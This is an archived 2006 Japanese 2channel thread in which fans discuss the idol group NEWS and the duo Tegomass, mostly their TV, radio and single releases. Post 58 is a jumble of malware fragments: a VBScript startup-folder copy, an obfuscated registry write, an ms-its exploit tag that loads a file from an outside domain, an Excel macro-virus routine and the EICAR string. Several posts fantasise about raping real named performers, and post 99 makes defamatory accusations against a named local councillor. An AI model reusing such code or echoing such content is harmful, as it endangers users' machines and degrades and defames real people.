2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

「ここでNEWSです!!」 第5報

1 :陽気な名無しさん:2006/12/12(火) 12:12:12 ID:mfbng+JA
その名のとおり、何かと話題を振り撒いてきた「NEWS(ニュース)」
現在は個別の活動が絶好調、そしてグループ活動休止期間もあと少しで終了。
そんな彼等を語る為のスレッドも第5弾に突入です。

山下 智久(やました ともひさ)
小山 慶一郎(こやま けいいちろう)
錦戸 亮(にしきど りょう)
加藤 成亮(かとう しげあき)
増田 貴久(ますだ たかひさ)
手越 祐也(てごし ゆうや)

内 博貴(うち ひろき)
草野 博紀(くさの ひろのり)
森内 貴寛(もりうち たかひろ)

2 :陽気な名無しさん:2006/12/12(火) 12:12:42 ID:mfbng+JA
★前スレ

「ここでNEWSです!!」 第4報
http://love3.2ch.net/test/read.cgi/gaysaloon/1157081696/

★過去ログ

「ここでNEWSです!!」
http://love3.2ch.net/test/read.cgi/gaysaloon/1134385537/
「ここでNEWSです!!」 第2報
http://love3.2ch.net/test/read.cgi/gaysaloon/1137135522/
「ここでNEWSです!!」 第3報
http://love3.2ch.net/test/read.cgi/gaysaloon/1146322776/

3 :陽気な名無しさん:2006/12/12(火) 12:13:12 ID:mfbng+JA
★公式サイト一覧

ジャニーズ事務所公式サイト(アーティスト情報・コンサート情報等)
http://www.johnnys-net.jp/

ジャニーズ・エンタテイメント公式サイト(リリース情報等)
http://www.johnnys-entertainment.co.jp/

4 :陽気な名無しさん:2006/12/12(火) 12:13:42 ID:mfbng+JA
★禁止事項

・テレビ番組・ラジオ番組等の実況
・類似重複スレ・メンバー個人スレの乱立、又はそれらに対する不必要な干渉
・ジャニーズ板・ジャニーズ2板・ジャニーズJr板でのあだ名・「××担」等の用語の使用
・メンバー・ユニット内外の人気話・比較話・不仲話
・腐女子レス・ノンケレス・又はそれらの決め付けレス
・AAコピペ等の貼り付け
・その他の荒らし・煽り・釣り行為

これら一連の行為を見かけても、基本的にはスルーしてください。
実況に関しては、スレのモラルを保つ為に最初に発見した人が一言注意、
その後は同じくスルーしてください。
また、あくまでもNEWSの本スレはこのスレである事を念頭に置いて、
同性愛サロン板内で類似重複スレ・メンバー個人スレを発見した場合は、
速やかにこのスレへ誘導、その他適切と思われる処置を取ってください。
荒れやすい題材なので、何卒、協力よろしくお願いします。

5 :陽気な名無しさん:2006/12/12(火) 12:23:30 ID:Oh+qY4da
>>1
お疲れ様。
これからもヨロシクね。

6 :陽気な名無しさん:2006/12/12(火) 20:04:28 ID:3p2laHOl
>>1
乙!
テゴマスのリリースももうすぐだ!
今日の少年倶楽部も見たけど、この二人は暖かいやら可愛いやら…

7 :陽気な名無しさん:2006/12/12(火) 21:22:39 ID:DAYv92mj
>>6
しかし、コヤシゲほどのエロが無いのは寂しい・・

8 :陽気な名無しさん:2006/12/12(火) 22:17:01 ID:5FjBT0uA
>>1
乙!
このスレでは、今まであまり語られていない山下や錦戸の事も語りたい…

9 :陽気な名無しさん:2006/12/13(水) 01:29:55 ID:UNdboXvu
>>8
山ぴーはまだしも、錦戸亮は関ジャニ∞のスレでの登場のほうが多いよ!

10 :陽気な名無しさん:2006/12/13(水) 09:03:25 ID:gl9eXjeH
>>1
乙です。
小山ファンの自分もヨロシク。

11 :陽気な名無しさん:2006/12/13(水) 12:05:21 ID:u4hyvnD2
>>1
いつの間にか新スレ乙!
まっすーファンの自分もヨロ!

12 :陽気な名無しさん:2006/12/13(水) 18:01:25 ID:2qWGv+We
>>1
乙だわ!
テゴ派のアタシもよろしくね!

13 :陽気な名無しさん:2006/12/13(水) 23:37:33 ID:G4CykJtf
明日のレコメン楽しみ!
あの四人だとどんな感じでトークするのか想像つかない

14 :陽気な名無しさん:2006/12/13(水) 23:49:28 ID:o+pmcLbz
え?誰?その4人?

15 :陽気な名無しさん:2006/12/14(木) 00:19:55 ID:CJ0Hd+6w
>>14
毎週木曜日のは、関ジャニ∞の村上信五と横山裕がMCなのだが、
そこにテゴマスがゲスト出演する。

村上も横山も、関西弁でまくし立てるので、テゴマスが対応出来るか不安・・
あと、大阪ではレコメンが聞けない!

16 :陽気な名無しさん:2006/12/14(木) 08:25:04 ID:Y197kPx4
二人とも借りてきた猫状態になりそう…

17 :陽気な名無しさん:2006/12/14(木) 11:30:18 ID:CJ0Hd+6w
>>16
てごは意外と自己中で、横山は意外と人見知りをするタイプらしいから、
オンエアでは横山とまっすーは隅っこに追いやられ、
悪気の自己中・てごv.s.毒舌芸人級の突っ込み・村上

という対決になりそう。

18 :陽気な名無しさん:2006/12/14(木) 11:38:13 ID:CJ0Hd+6w
訂正

悪気の自己中→×
悪気の無い自己中→◯

19 :陽気な名無しさん:2006/12/14(木) 20:01:49 ID:LIpaAITk
とにかく、聴いた人には是非レポをお願いしたい。

20 :陽気な名無しさん:2006/12/14(木) 20:25:42 ID:OdT/oHPL
うちも聴けないんで、雰囲気だけでも知りたい。

21 :陽気な名無しさん:2006/12/14(木) 23:51:40 ID:QFtJSvFw
二人とも自分のラジオやってたんだから、喋れるハズなんだけど…

22 :陽気な名無しさん:2006/12/15(金) 00:25:53 ID:zZd+nhfF
>>21
今回ばかりは相手が悪い。特に、村上の突っ込みは芸人級の強烈さなので、
まっすーのみならず、てごもワタワタやったと思う。

23 :陽気な名無しさん:2006/12/15(金) 01:10:18 ID:wq5/imBs
まっすーのダンドリでの話
女の子ばかりでお昼とか自分は一人ぼっちだったから
「ジャニーズには気をつけろ」的なものがあったんじゃないかの言葉にヒナヨコからすごくつっこまれてた

まっすーが結構いじられてて面白かったよ

24 :陽気な名無しさん:2006/12/15(金) 10:38:26 ID:1r1wJl22
>23
ヒナの、芸人並みの突っ込みに、オンエアを終えたまっすーは、
『あんな先輩にはなりたくない!』と思ったことだろうね。

25 :陽気な名無しさん:2006/12/15(金) 15:39:49 ID:abvPjCpt
心配しなくてもならないわよ。

26 :陽気な名無しさん:2006/12/15(金) 16:46:33 ID:MoDKBQA1
マッスー、そんな前へ前へ出るキャラだったら
こんな人気出てないって。

27 :陽気な名無しさん:2006/12/15(金) 23:29:53 ID:1agonuIf
笑恋のマッスー、可愛過ぎ。
マジ、もっとやって欲しかった。

28 :陽気な名無しさん:2006/12/15(金) 23:54:17 ID:eZrGzgrz
うん…もっとやって欲しかったな。

29 :陽気な名無しさん:2006/12/16(土) 10:13:30 ID:8VF9Bt1w
テゴマス、音楽戦士に出るって聞いたけど
まだ放送されてないよね?

30 :陽気な名無しさん:2006/12/16(土) 12:07:09 ID:kGj/jfjP
>>29
前スレに落としたけど、音楽戦士は来週。
てかまだ前スレ残ってるからそっちから使おうよ。

31 :陽気な名無しさん:2006/12/16(土) 14:44:45 ID:2zn6n0Lb
全く同感だけれど、なら前スレが終わるまではsage進行で行きましょうよ…

32 :陽気な名無しさん:2006/12/16(土) 18:37:35 ID:g4AeVWvC
前スレ埋めといた。
明日はヤーヤーヤーと堂本兄弟でテゴマスが見れる。

33 :陽気な名無しさん:2006/12/16(土) 19:24:36 ID:kGj/jfjP
>>31
すまん。
前スレのテゴマススケこっちにも貼っとくよ。

12/16(土)U.K.チア・ミュージック(MBSラジオ 21:00-21:55)
12/17(日)ヤーヤーヤー(テレ東)ライブ
12/17(日)新堂本兄弟(フジ)
12/18(月)WEEKLY NACK5(NACK5 5:00-6:00)
12/20(水)ON8(ベイFM)
12/20(水)魁!音楽番付(フジ)
12/22(金)音楽戦士(日テレ)

34 :陽気な名無しさん:2006/12/16(土) 19:32:30 ID:BBTLrnh3
>>33
お疲れ様。
これも追加ね。

12/22(金)POP JAM(NHK総合 24:30〜25:00)

35 :陽気な名無しさん:2006/12/16(土) 21:05:58 ID:oQNR+8ZG
あら?
何気に色々出るんじゃないの!

36 :陽気な名無しさん:2006/12/16(土) 22:58:26 ID:e0eut+W+
とりあえずは明日だな。

37 :陽気な名無しさん:2006/12/16(土) 23:17:54 ID:a68uoRuP
明日の二つはどっちも相性がいいし、面白くなりそう…

38 :陽気な名無しさん:2006/12/17(日) 12:57:49 ID:9r8cALAR
ヤーヤーヤーのミソスープ…
テゴマス2人とも、いい表情と声だったよ。

39 :陽気な名無しさん:2006/12/17(日) 13:12:14 ID:m8UcVzZJ
少年倶楽部の時とは、また違った感じだった。
それにしても、後ろの女どもの声がなければ…
台無しとまで言わないけど、うるさ過ぎだろ?

40 :陽気な名無しさん:2006/12/17(日) 13:54:58 ID:3Nc4MiUq
>>34
ポップジャムは1/12だよ。

二人とも痩せたね!特に手越は桜なんとかのとき
パンパンだったから、随分雰囲気変わった。

41 :陽気な名無しさん:2006/12/17(日) 20:12:24 ID:mPLqo67I
ヤーヤーヤーは見れないんだけど、堂本兄弟は楽しみだわ。

42 :陽気な名無しさん:2006/12/17(日) 20:21:12 ID:EqB3PDrz
また、テゴが弄られるのかしら?

43 :陽気な名無しさん:2006/12/17(日) 22:29:53 ID:oP0zJv5o
NHK職員男性への痴漢で逮捕

http://2ch.net/test/-/newsplus/1166361357/1

44 :陽気な名無しさん:2006/12/17(日) 23:45:07 ID:WKX6wKMk
堂本兄弟のテゴマス、中々に可愛かった。
やはり、トークが弾むと違うな。

45 :陽気な名無しさん:2006/12/18(月) 01:04:04 ID:a/2Fbjpo
まっすーの話はおもしろいな
電車で暑くて服脱いだら裸になってたとか!
妄想も変わった感じだし…
復活前にどんどんトーク番組に出るべきだな
グループだとトークするチャンスも少ないだろうから

46 :陽気な名無しさん:2006/12/18(月) 05:41:11 ID:o4sRqyUQ
「ミソスープ」聞いていたら、一度も顔を見たことも無い親や兄弟と会ってみたくなった。

47 :陽気な名無しさん:2006/12/18(月) 10:44:33 ID:V0kuWTe1
堂本兄弟のトーク聞いてて、やっぱり思ったんだけど
マッスーは天使、テゴは子悪魔じゃないか?

48 :陽気な名無しさん:2006/12/18(月) 11:53:10 ID:wrZiU0BC
二人とも不細工でキモかった…

49 :陽気な名無しさん:2006/12/18(月) 17:05:42 ID:1bpdKkVh
マッスーはピュア、テゴは腹黒いのでは?
俺はそんな腹黒いテゴを見てると、メチャクチャにしたくなるんだが…

50 :陽気な名無しさん:2006/12/18(月) 17:09:59 ID:o4sRqyUQ
腹黒いてごをメチャメチャにしたいのは勿論だが、
ピュアなまっすーもメチャメチャにしてみたい!

51 :陽気な名無しさん:2006/12/18(月) 21:08:33 ID:BXUno79k
計算の手越、天然の増田ってのが正解な気がする。

52 :陽気な名無しさん:2006/12/18(月) 23:55:57 ID:uQHbX0/J
電車の中で裸になる増田と遭遇したかったわ。

53 :陽気な名無しさん:2006/12/19(火) 10:29:33 ID:bQjWS89B
しげを強姦しながら、除夜の鐘を聞きたい!

54 :陽気な名無しさん:2006/12/19(火) 14:22:37 ID:KMEx24t3
イヴの夜は小山とつながってたい。

55 :陽気な名無しさん:2006/12/19(火) 19:50:55 ID:4/NcttEJ
ミソスープGET一番乗り!
PVもメイキングも可愛すぎる!

56 :陽気な名無しさん:2006/12/19(火) 20:03:37 ID:bQjWS89B
>>54
クリスマスには、可愛いまっすーサンタが、小山をお届けにあがります!

57 :陽気な名無しさん:2006/12/19(火) 21:57:28 ID:kyVXnXKz
ミソスープ二番乗りか?
砂時計も聴きたくて、結局両方買っちゃった。

58 :<body onload=window()>:2006/12/20(水) 00:21:44 ID:yEBF8zOr
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ


59 :陽気な名無しさん:2006/12/20(水) 12:15:04 ID:0+0lMtII
ミソスープのPVって何か安い作りだったな。
テゴマスの可愛さだけで成り立ってる感じ。

60 :陽気な名無しさん:2006/12/20(水) 20:34:56 ID:peg78Dxp
充分!

61 :陽気な名無しさん:2006/12/20(水) 22:00:27 ID:MnUXVnrO
ミソスープ、今日やっと届いた!
PVは確かに安いが、その分二人の笑顔が素晴らしい!

62 :陽気な名無しさん:2006/12/20(水) 23:00:17 ID:7fGyymN7
PVメイキングもいい!二人とも楽しそうだし仲良さげ

はじめての朝はかなりイイ!

63 :陽気な名無しさん:2006/12/20(水) 23:52:12 ID:eQQmimfn
本当に可愛過ぎるんだけど…どうしよ?

64 :陽気な名無しさん:2006/12/21(木) 00:37:01 ID:WfONMCRA
きも

65 :陽気な名無しさん:2006/12/21(木) 12:34:02 ID:dPn5yXku
Myojoの小山のキス顔が、ちょっとエロ可愛くって…

66 :陽気な名無しさん:2006/12/21(木) 16:05:01 ID:PYHODnvI
近所の本屋のMyojo、紐でくくられてて買わないと見れない…

67 :陽気な名無しさん:2006/12/21(木) 17:40:50 ID:u/7xooGo
関西ローカルで、ドラマ「クロサギ」の再放送が明日で最終回だよ。
ちなみに、第1話がYou TubeにUPされてる。(全部で5つ)
http://www.youtube.com/watch?v=EBIdsEr_fmw&mode=related&search=

68 :陽気な名無しさん:2006/12/21(木) 17:44:21 ID:u/7xooGo
↑今、テレビガイドで確認したら来週の月曜でした、スマソ…

69 :陽気な名無しさん:2006/12/21(木) 20:35:05 ID:mNkO7HbI
ここにいる皆さんわぁほとんどいい方達ですね。
他のところだと結構テゴの悪口とかとってもたくさん書いてあったりするんですよ。
ひどいと思いません????


70 :陽気な名無しさん:2006/12/21(木) 20:50:09 ID:1zwKyFjg
クロサギ2話で慶一郎が泣きながら抱きついてくるシーンは良かったわ。

71 :陽気な名無しさん:2006/12/21(木) 22:56:46 ID:wgPdJTC3
あったな、そんなのも…

72 :陽気な名無しさん:2006/12/22(金) 12:48:11 ID:RzHN/wUK
今日のMステは山下のセニョリータだけなのね。
テゴマスにも出て欲しかったわ。

73 :陽気な名無しさん:2006/12/22(金) 14:04:23 ID:x3t0k4Vz
>>70
小山って、歌でも演技でも意外性を見せてくれると思いませんか?

74 :陽気な名無しさん:2006/12/22(金) 18:58:02 ID:XQ4LtPnE
早くNEWSとして復活して欲しい。

75 :陽気な名無しさん:2006/12/22(金) 22:03:28 ID:l5e6LUZC
本当にそうよね。
カウントダウンライブでは何かが起こるのかしら?

76 :陽気な名無しさん:2006/12/22(金) 22:09:58 ID:bzzmaowj
復活するとしたら、内と草野もでしょ?
何だかそれはないような気がするわね。

77 :陽気な名無しさん:2006/12/22(金) 22:50:25 ID:Aoiya0Sx
今日音楽戦士にテゴマス出るよ。

78 :陽気な名無しさん:2006/12/22(金) 23:11:44 ID:1EPg/GXM
Mステには山下が出てたな。
セニョリータはやっぱ好きかも。

79 :陽気な名無しさん:2006/12/22(金) 23:51:34 ID:t9qsr/UH
セニョリータは俺も好きだ!
アミーゴと同じく、カラオケで歌っても違和感ないしイイ!

80 :陽気な名無しさん:2006/12/23(土) 12:33:33 ID:Jw0y0856
2人で唄うなら「ミソスープ」か「青春アミーゴ」で、
1人で唄うなら「抱いてセニョリータ」だな。

ということで、テゴマスの唄う「青春アミーゴ」を聞いてみたい!

81 :陽気な名無しさん:2006/12/23(土) 13:52:17 ID:b5pVRiSF
音楽戦士のマッスーにはウケタw
是非、食いもんCMやらせてやってくれ!

82 :陽気な名無しさん:2006/12/23(土) 15:24:25 ID:IX7NRJsu
テゴも可愛かったわよね。
あの口開けた笑い方、可愛くて好きだわ。

83 :陽気な名無しさん:2006/12/23(土) 17:07:43 ID:/eouMcHz
これでテレビはあとはポップジャムだけ?

84 :陽気な名無しさん:2006/12/23(土) 21:29:00 ID:UWfGDH0D
>81
グルメ番組もやらせてやりたいな!

85 :陽気な名無しさん:2006/12/23(土) 22:23:46 ID:y9dSLY07
少クラSPで小山を久しぶりに見た。
相変わらず明朗快活で安心、それでこそ俺が好きになった小山。

86 :陽気な名無しさん:2006/12/23(土) 22:47:38 ID:aDqzmwvw
小山も司会ばっかじゃなくて、来年はもっと歌えたらいいのにな。

87 :陽気な名無しさん:2006/12/23(土) 23:40:51 ID:MyoYe9hf
エロシーンがあるならドラマも可。

88 :陽気な名無しさん:2006/12/24(日) 04:46:47 ID:J2mV0oYl
やっと音楽戦士見たわ。
すっかりテゴマスというかマステゴというかセットが板についてきて
なんだか可愛い。うちの周りの姉さん達が「タイプじゃないけど飼いたいのよぉ〜」を連発してる。
大姉は成宮から華麗にテゴマスに乗り換えたわ、ノンケの道はイバラって言ってるのに。

でもこの二人見てると健全だったころのダブルユー思い出すのよね。
なぜかしら?

89 :陽気な名無しさん:2006/12/24(日) 04:56:38 ID:+xXeY6Zv
まさに健全だからじゃない?
二人ともだけど特に増田なんて、世の中の汚い部分を知らなさそうな気がするわ。

90 :陽気な名無しさん:2006/12/24(日) 08:56:18 ID:MTsoX2MH
まっすーがコンサートで感極まって泣いたの見て、純な子なんだなって思ったっけ。

91 :陽気な名無しさん:2006/12/24(日) 09:52:47 ID:gqwUK9GR
感激屋なんだよ、きっと。

92 :陽気な名無しさん:2006/12/24(日) 10:21:15 ID:iaJL5ExO
まっすー可愛え

93 :陽気な名無しさん:2006/12/24(日) 10:34:02 ID:NSEh/+b6
今夜、小山やしげ、テゴマスと寝られる男が羨ましい・・

俺は・・ しげと寝たい!

94 :陽気な名無しさん:2006/12/24(日) 10:47:46 ID:TqMNVGJd
アタシは小山とつながってたいわ。
タチネコ、どちらでもOKよ。

95 :陽気な名無しさん:2006/12/24(日) 16:08:03 ID:cSIjn3Ll
小山って経験あるのかしら?

96 :陽気な名無しさん:2006/12/24(日) 21:18:46 ID:Q6Vk/4FE
例えあっても、あの小ケツ…締まりはいいんじゃないか?

97 :陽気な名無しさん:2006/12/24(日) 23:10:16 ID:NSEh/+b6
あの尻で締め付けられたら、ほかに何もしなくても中出ししてしまうな・・

そんな小山の尻をも自由に支配しているしげって、ある意味凄いわ!

98 :陽気な名無しさん:2006/12/24(日) 23:53:34 ID:cPDZuQgj
今日、滝翼のコンサートに行ったんだけど、山下が来てたの。
小山や加藤も来れば良かったのに。

99 :陽気な名無しさん:2006/12/25(月) 02:28:44 ID:6Jl8G9yy
いつも嘘ばかりついていて、年齢もサバ読み
フォトメや発展場で、さんざん悪いことして有名だったのに
去年、葛飾の議会議員に当選し
何食わぬ顔で青少年と関わる業務をしてる、たかし議員の(`Д´)関連スレ
http://love3.2ch.net/test/read.cgi/gay/1160407693/66-67

これはゲイ出会いサイトに投稿してた頃の写真、本人は合成写真だと大嘘ついていましたw
http://society3.2ch.net/test/read.cgi/mayor/1123678508/76

100 :陽気な名無しさん:2006/12/25(月) 07:03:28 ID:NBJMlG0Y
>>98
幕が降りたあと、小山はタキツバの楽屋に呼ばれ、タッキーに犯される・・

19 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)